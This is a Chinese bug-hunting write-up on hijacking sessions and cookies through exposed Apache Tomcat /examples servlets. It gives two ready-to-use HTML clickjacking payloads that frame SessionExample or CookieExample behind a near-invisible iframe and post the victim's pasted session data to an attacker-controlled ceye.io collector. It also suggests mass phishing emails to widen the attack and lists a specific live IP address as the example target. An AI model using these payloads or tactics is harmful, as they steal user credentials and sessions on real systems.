挖洞经验之Tomcat Examples利用
一、内容:挖洞经验 利用Tomcat Examples劫持任意账号,从而获得高危赏金
二、前提:如果当前系统刚好采用tomcat容器的cookie或者session进行
三、案例:
访问:http://**/examples/[1]
扫描目录发现存在 examples
如果当前系统刚好采用tomcat容器的cookie或者session进行身份验证,利用点击劫持,那么是有机会劫持登陆用户的身份信息
常见的session路径:/examples/servlets/servlet/SessionExample
常见的Cookie路径:/examples/servlets/servlet/CookieExample
session劫持POC,保存为html:
<head>
<style>
iframe#fgframe {opacity:5%;}
</style>
</head>
<h1>LSP专用</h1>
<h2>只需要ctrl +c ;ctrl + v ;点击一下就可以了</h2>
<iframe id = "fgframe" height="650px" width="400px" src = "http://IP/examples/servlets/servlet/SessionExample">
</iframe>
<form action="http://xxxx.ceye.io" method="POST">
<div>
<lable for = "say"> 你敢弄不?</lable>
<textarea id = "cookie" name = "cookie" rows ="4" cols="50">
</textarea>
<div>
<div>
<button>点下就给个高危</button>
</div>
</form>
cookie劫持POC,保存为html:
<head>
<style>
iframe#fgframe {opacity:5%;}
</style>
</head>
<h1>LSP专用</h1>
<h2>只需要ctrl +c ;ctrl + v ;点击一下就可以了</h2>
<iframe id = "fgframe" height="650px" width="400px" src="http://IP/examples/servlets/servlet/CookieExample">
</iframe>
<form action="http://xxxx.ceye.io" method="POST">
<div>
<lable for = "say"> 你敢弄不?</lable>
<textarea id = "cookie" name = "cookie" rows ="4" cols="50">
</textarea>
<div>
<div>
<button>点下就给个高危</button>
</div>
</form>
最终效果:
成功劫持到信息!!!
四、技术点总结:
1、需要受害者先登陆系统,然后利用examples特性获取当前用户session或者cookie
2、利用点击劫持诱导用户做出操作,并将数据转发到自己的服务器上面
3、利用批量邮件或者钓鱼网站扩大危害
4、常见的session路径:/examples/servlets/servlet/SessionExample
5、常见的Cookie路径:/examples/servlets/servlet/CookieExample
漏洞参照:
https://hackerone.com/reports/674741
References
[1]
http://**/examples/: http://117.186.248.41/examples